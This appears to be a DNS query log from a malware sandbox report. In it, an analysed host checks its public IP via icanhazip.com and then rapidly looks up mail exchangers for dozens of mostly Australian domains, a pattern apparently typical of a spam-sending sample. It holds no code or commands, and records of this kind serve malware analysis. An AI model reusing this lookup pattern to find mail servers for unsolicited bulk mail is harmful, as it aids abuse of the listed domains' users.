                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:15.180718899 CET8.8.8.8192.168.2.30x504dNo error (0)icanhazip.com104.18.114.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:15.180718899 CET8.8.8.8192.168.2.30x504dNo error (0)icanhazip.com104.18.115.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.172997952 CET8.8.8.8192.168.2.30x3fdcNo error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.172997952 CET8.8.8.8192.168.2.30x3fdcNo error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.199906111 CET8.8.8.8192.168.2.30xe0No error (0)asav2.iinet.net.au27.32.32.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.282802105 CET8.8.8.8192.168.2.30xee39Name error (3)oic.nsw.gov.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.355839014 CET8.8.8.8192.168.2.30x9fedNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.355839014 CET8.8.8.8192.168.2.30x9fedNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.355839014 CET8.8.8.8192.168.2.30x9fedNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.401978016 CET8.8.8.8192.168.2.30x472cNo error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.401978016 CET8.8.8.8192.168.2.30x472cNo error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.401978016 CET8.8.8.8192.168.2.30x472cNo error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.401978016 CET8.8.8.8192.168.2.30x472cNo error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.401978016 CET8.8.8.8192.168.2.30x472cNo error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.401978016 CET8.8.8.8192.168.2.30x472cNo error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.401978016 CET8.8.8.8192.168.2.30x472cNo error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.401978016 CET8.8.8.8192.168.2.30x472cNo error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.422921896 CET8.8.8.8192.168.2.30xe991No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.422921896 CET8.8.8.8192.168.2.30xe991No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.422921896 CET8.8.8.8192.168.2.30xe991No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.453093052 CET8.8.8.8192.168.2.30x17bdNo error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.453093052 CET8.8.8.8192.168.2.30x17bdNo error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.453093052 CET8.8.8.8192.168.2.30x17bdNo error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.453093052 CET8.8.8.8192.168.2.30x17bdNo error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.453093052 CET8.8.8.8192.168.2.30x17bdNo error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.453093052 CET8.8.8.8192.168.2.30x17bdNo error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.453093052 CET8.8.8.8192.168.2.30x17bdNo error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.453093052 CET8.8.8.8192.168.2.30x17bdNo error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.521552086 CET8.8.8.8192.168.2.30xb8f7No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.521552086 CET8.8.8.8192.168.2.30xb8f7No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.545550108 CET8.8.8.8192.168.2.30x2bdaNo error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.611870050 CET8.8.8.8192.168.2.30x19beNo error (0)nwqphc.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.684864044 CET8.8.8.8192.168.2.30x9a74No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.784085035 CET8.8.8.8192.168.2.30xa64cNo error (0)nwqphc.com.au188.165.138.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:17.810713053 CET8.8.8.8192.168.2.30x7a7dNo error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.078761101 CET8.8.8.8192.168.2.30x4a40No error (0)bwcl.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.091471910 CET8.8.8.8192.168.2.30x3986No error (0)free.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.091471910 CET8.8.8.8192.168.2.30x3986No error (0)free.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.121026039 CET8.8.8.8192.168.2.30x914dNo error (0)mx1.free.fr212.27.48.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.121026039 CET8.8.8.8192.168.2.30x914dNo error (0)mx1.free.fr212.27.48.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.146960974 CET8.8.8.8192.168.2.30xfabdNo error (0)bwcl-com-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.146960974 CET8.8.8.8192.168.2.30xfabdNo error (0)bwcl-com-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.210206032 CET8.8.8.8192.168.2.30x2323No error (0)britanniatravel.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.235953093 CET8.8.8.8192.168.2.30x8204No error (0)sydneywater.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.235953093 CET8.8.8.8192.168.2.30x8204No error (0)sydneywater.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.267935038 CET8.8.8.8192.168.2.30xe844No error (0)sydneywater-com-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.267935038 CET8.8.8.8192.168.2.30xe844No error (0)sydneywater-com-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.449081898 CET8.8.8.8192.168.2.30xcda1No error (0)dws.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.449081898 CET8.8.8.8192.168.2.30xcda1No error (0)dws.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.449081898 CET8.8.8.8192.168.2.30xcda1No error (0)dws.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.484704971 CET8.8.8.8192.168.2.30xc7e2No error (0)dws-com-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.484704971 CET8.8.8.8192.168.2.30xc7e2No error (0)dws-com-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.493637085 CET8.8.8.8192.168.2.30xb160No error (0)penfold.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.493637085 CET8.8.8.8192.168.2.30xb160No error (0)penfold.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.528790951 CET8.8.8.8192.168.2.30xe955No error (0)britanniatravel.com.au203.210.102.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.568094969 CET8.8.8.8192.168.2.30x2dbcNo error (0)eu-smtp-inbound-1.mimecast.com91.220.42.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.568094969 CET8.8.8.8192.168.2.30x2dbcNo error (0)eu-smtp-inbound-1.mimecast.com195.130.217.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.568094969 CET8.8.8.8192.168.2.30x2dbcNo error (0)eu-smtp-inbound-1.mimecast.com195.130.217.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.568094969 CET8.8.8.8192.168.2.30x2dbcNo error (0)eu-smtp-inbound-1.mimecast.com91.220.42.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.568094969 CET8.8.8.8192.168.2.30x2dbcNo error (0)eu-smtp-inbound-1.mimecast.com91.220.42.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.568094969 CET8.8.8.8192.168.2.30x2dbcNo error (0)eu-smtp-inbound-1.mimecast.com195.130.217.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.572135925 CET8.8.8.8192.168.2.30x7116No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.572135925 CET8.8.8.8192.168.2.30x7116No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.572135925 CET8.8.8.8192.168.2.30x7116No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.593604088 CET8.8.8.8192.168.2.30xc1d5No error (0)iprimus.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.593604088 CET8.8.8.8192.168.2.30xc1d5No error (0)iprimus.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.684784889 CET8.8.8.8192.168.2.30xa902No error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.684784889 CET8.8.8.8192.168.2.30xa902No error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.684784889 CET8.8.8.8192.168.2.30xa902No error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.684784889 CET8.8.8.8192.168.2.30xa902No error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.684784889 CET8.8.8.8192.168.2.30xa902No error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.684784889 CET8.8.8.8192.168.2.30xa902No error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.684784889 CET8.8.8.8192.168.2.30xa902No error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.684784889 CET8.8.8.8192.168.2.30xa902No error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.689527035 CET8.8.8.8192.168.2.30x427eNo error (0)mx.syd.iprimus.com.au203.134.71.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.698543072 CET8.8.8.8192.168.2.30x117dNo error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.799312115 CET8.8.8.8192.168.2.30xf39aNo error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.799627066 CET8.8.8.8192.168.2.30x65fdNo error (0)aapt.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.902977943 CET8.8.8.8192.168.2.30xa66No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:18.905194998 CET8.8.8.8192.168.2.30xd3a6No error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.047632933 CET8.8.8.8192.168.2.30xaaf7No error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.180553913 CET8.8.8.8192.168.2.30x27c8No error (0)mq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.180553913 CET8.8.8.8192.168.2.30x27c8No error (0)mq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.242180109 CET8.8.8.8192.168.2.30x8c45No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.242180109 CET8.8.8.8192.168.2.30x8c45No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.242180109 CET8.8.8.8192.168.2.30x8c45No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.249090910 CET8.8.8.8192.168.2.30x82No error (0)au-smtp-inbound-1.mimecast.com103.13.69.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.249090910 CET8.8.8.8192.168.2.30x82No error (0)au-smtp-inbound-1.mimecast.com124.47.150.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.249090910 CET8.8.8.8192.168.2.30x82No error (0)au-smtp-inbound-1.mimecast.com124.47.150.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.249090910 CET8.8.8.8192.168.2.30x82No error (0)au-smtp-inbound-1.mimecast.com103.13.69.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.388513088 CET8.8.8.8192.168.2.30x86ebNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.388513088 CET8.8.8.8192.168.2.30x86ebNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.388513088 CET8.8.8.8192.168.2.30x86ebNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.394542933 CET8.8.8.8192.168.2.30xb1f8No error (0)abc.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.394542933 CET8.8.8.8192.168.2.30xb1f8No error (0)abc.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.397145033 CET8.8.8.8192.168.2.30x5e12No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.397145033 CET8.8.8.8192.168.2.30x5e12No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.397145033 CET8.8.8.8192.168.2.30x5e12No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.397145033 CET8.8.8.8192.168.2.30x5e12No error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.397145033 CET8.8.8.8192.168.2.30x5e12No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.397145033 CET8.8.8.8192.168.2.30x5e12No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.397145033 CET8.8.8.8192.168.2.30x5e12No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.397145033 CET8.8.8.8192.168.2.30x5e12No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.490645885 CET8.8.8.8192.168.2.30xa262No error (0)bigpond.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.491529942 CET8.8.8.8192.168.2.30x290eNo error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.491529942 CET8.8.8.8192.168.2.30x290eNo error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.491529942 CET8.8.8.8192.168.2.30x290eNo error (0)mta7.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.491529942 CET8.8.8.8192.168.2.30x290eNo error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.491529942 CET8.8.8.8192.168.2.30x290eNo error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.491529942 CET8.8.8.8192.168.2.30x290eNo error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.491529942 CET8.8.8.8192.168.2.30x290eNo error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.491529942 CET8.8.8.8192.168.2.30x290eNo error (0)mta7.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.522212982 CET8.8.8.8192.168.2.30x970bNo error (0)extmail.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.522212982 CET8.8.8.8192.168.2.30x970bNo error (0)extmail.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.626048088 CET8.8.8.8192.168.2.30xcf8bNo error (0)mxb-0036d701.gslb.pphosted.com185.183.28.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.729566097 CET8.8.8.8192.168.2.30x54deNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.729566097 CET8.8.8.8192.168.2.30x54deNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.729566097 CET8.8.8.8192.168.2.30x54deNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.749295950 CET8.8.8.8192.168.2.30xd7c3No error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.749295950 CET8.8.8.8192.168.2.30xd7c3No error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.938402891 CET8.8.8.8192.168.2.30xf6d1No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.938402891 CET8.8.8.8192.168.2.30xf6d1No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.938402891 CET8.8.8.8192.168.2.30xf6d1No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.938402891 CET8.8.8.8192.168.2.30xf6d1No error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.938402891 CET8.8.8.8192.168.2.30xf6d1No error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.938402891 CET8.8.8.8192.168.2.30xf6d1No error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.938402891 CET8.8.8.8192.168.2.30xf6d1No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:19.938402891 CET8.8.8.8192.168.2.30xf6d1No error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.017875910 CET8.8.8.8192.168.2.30x6894No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.017875910 CET8.8.8.8192.168.2.30x6894No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.017875910 CET8.8.8.8192.168.2.30x6894No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.017875910 CET8.8.8.8192.168.2.30x6894No error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.017875910 CET8.8.8.8192.168.2.30x6894No error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.017875910 CET8.8.8.8192.168.2.30x6894No error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.017875910 CET8.8.8.8192.168.2.30x6894No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.017875910 CET8.8.8.8192.168.2.30x6894No error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.033746958 CET8.8.8.8192.168.2.30xff36No error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.059263945 CET8.8.8.8192.168.2.30xb79dNo error (0)bigpond.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.146164894 CET8.8.8.8192.168.2.30x2427No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.146164894 CET8.8.8.8192.168.2.30x2427No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.146164894 CET8.8.8.8192.168.2.30x2427No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.237586021 CET8.8.8.8192.168.2.30x6596No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.237586021 CET8.8.8.8192.168.2.30x6596No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.237586021 CET8.8.8.8192.168.2.30x6596No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.242465973 CET8.8.8.8192.168.2.30x7f03No error (0)extmail.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.242465973 CET8.8.8.8192.168.2.30x7f03No error (0)extmail.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.245507956 CET8.8.8.8192.168.2.30xe1b1No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.245507956 CET8.8.8.8192.168.2.30xe1b1No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.245507956 CET8.8.8.8192.168.2.30xe1b1No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.245507956 CET8.8.8.8192.168.2.30xe1b1No error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.245507956 CET8.8.8.8192.168.2.30xe1b1No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.245507956 CET8.8.8.8192.168.2.30xe1b1No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.245507956 CET8.8.8.8192.168.2.30xe1b1No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.245507956 CET8.8.8.8192.168.2.30xe1b1No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.380635977 CET8.8.8.8192.168.2.30x9287No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.380635977 CET8.8.8.8192.168.2.30x9287No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.380635977 CET8.8.8.8192.168.2.30x9287No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.466135025 CET8.8.8.8192.168.2.30xe876No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
